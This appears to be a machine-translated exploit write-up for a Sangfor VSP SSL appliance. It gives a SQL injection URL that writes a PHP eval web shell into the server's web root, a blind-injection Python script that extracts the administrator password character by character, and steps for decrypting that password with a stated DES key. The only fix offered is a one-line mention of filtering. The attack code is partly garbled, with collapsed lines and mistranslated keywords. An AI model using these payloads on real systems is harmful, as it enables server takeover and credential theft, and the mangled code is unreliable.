Sangfor VSP external data center getshell
1. getshell:
https://localhost/src/login.php?action_c=login&user_type=1&user=admin&pass=admin&nodeid=1 and 1=2 union select 0x3c3f70687020406576616c28245f504f53545b277362275d293b3f3e into outfile 'D:\\Program Files\\Sangfor\\SSL\\LogKeeper\\htdocs\\test.php'
2. Inject to get the Administrator Password
Close the door, go to python
# Encoding: utf-8import requestsimport sysimport timeif len (sys. argv) <2: print "useage: test. py target \ r" print "example: python test. py https://192.168.222.128/ "Sys. exit (0) target = sys. argv [1] def exploit (url, pointer): password = "" list = ["a", "B", "c", "d", "e ", "f", "0", "1", "2", "3", "4", "5", "6", "7", "8 ", "9"] while pointer <17: flag = Falseindex = 0 while (index <len (list): SQL = "and (select mid (sys_adt_pass, % d, 1) from sys_adt where id = 1) = \ "% s \" "% (pointer + 1, list [index]) response = requests. get (url + "src/login. php? Action_c = login & user_type = 1 & user = admin & pass = & nodeid = 1 "+ SQL, timeout = 10, verify = False) if" login denied "in response. content: # When the IP address is blocked, the latency is 305 seconds. print "login failure exceeded 5 times, ip is banned, wait for 305 seconds to continue" time. sleep (305) elif "incorrect user name or password" in response. content: print "password [% d] = % s" % (pointer, list [index]) password + = list [index] breakelif "database connection failed" in response. content: index + = 1 else: print" Error, exit! "Sys. exit (0) pointer + = 1 print (" Admin's password is % s ") % (password) exploit (target, 0) print" done!"
Running effect:
Open this website to decrypt the http://des.online-domain-tools.com/
Remove the last digit of the password. The key is tjf. Click decrypt to obtain the plaintext password.
Solution:
Enhanced Filtering